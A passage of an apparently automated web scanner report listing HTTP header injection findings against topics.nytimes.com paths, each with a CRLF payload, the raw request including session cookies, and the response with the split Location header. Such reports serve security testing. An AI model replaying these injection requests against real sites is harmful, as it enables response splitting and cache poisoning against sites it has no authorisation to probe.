Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:53 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/science/93137
300951b64e8/globalwarming/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.45. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/news/science/topics/globalwarming/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload ffc0c%0d%0a5ed16640b46 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/news/science/topics/ffc0c%0d%0a5ed16640b46/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:53 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/science/topics/ffc0c
5ed16640b46/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.46. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/editorials/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9c216%0d%0aceb0867e582 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/9c216%0d%0aceb0867e582/editorialsandoped/editorials/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:39 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/9c216
ceb0867e582/editorialsandoped/editorials/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.47. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/editorials/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 633c2%0d%0a634021120ae was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/633c2%0d%0a634021120ae/editorials/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/633c2
634021120ae/editorials/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.48. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/editorials/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 5b057%0d%0a7de59d5e87c was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/5b057%0d%0a7de59d5e87c/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:41 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/5b057
7de59d5e87c/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.49. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/letters/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 4f8b6%0d%0aedfd03c9e7d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/4f8b6%0d%0aedfd03c9e7d/editorialsandoped/letters/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:17 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/4f8b6
edfd03c9e7d/editorialsandoped/letters/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.50. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/letters/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 5ee1d%0d%0aff2ef789888 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/5ee1d%0d%0aff2ef789888/letters/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:17 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/5ee1d
ff2ef789888/letters/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.51. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/letters/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 37796%0d%0aa3f1fddc26a was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/37796%0d%0aa3f1fddc26a/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:17 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/37796
a3f1fddc26a/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.52. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/oped/columnists/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 69187%0d%0a2bc25511dfe was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/69187%0d%0a2bc25511dfe/editorialsandoped/oped/columnists/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:36 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/69187
2bc25511dfe/editorialsandoped/oped/columnists/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.53. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/oped/columnists/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload dacbc%0d%0a30104000c6c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/dacbc%0d%0a30104000c6c/oped/columnists/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:36 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/dacbc
30104000c6c/oped/columnists/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.54. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/oped/columnists/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload f176e%0d%0a6d9076032fb was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/f176e%0d%0a6d9076032fb/columnists/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:36 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/f176e
6d9076032fb/columnists/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.55. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/oped/columnists/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 95d86%0d%0a19497670268 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/oped/95d86%0d%0a19497670268/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:37 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/oped/95d86
19497670268/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.56. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/oped/columnists/paulkrugman/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload cdd86%0d%0a38aad6d8e1e was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/cdd86%0d%0a38aad6d8e1e/editorialsandoped/oped/columnists/paulkrugman/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/cdd86
38aad6d8e1e/editorialsandoped/oped/columnists/paulkrugman/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.57. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/oped/columnists/paulkrugman/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 8a68b%0d%0a66ffcb46ee5 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/8a68b%0d%0a66ffcb46ee5/oped/columnists/paulkrugman/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/8a68b
66ffcb46ee5/oped/columnists/paulkrugman/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.58. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/oped/columnists/paulkrugman/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 5d2b0%0d%0aa613315c88b was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/5d2b0%0d%0aa613315c88b/columnists/paulkrugman/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/5d2b0
a613315c88b/columnists/paulkrugman/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.59. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/oped/columnists/paulkrugman/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 9110f%0d%0af9cc7c13367 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/oped/9110f%0d%0af9cc7c13367/paulkrugman/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
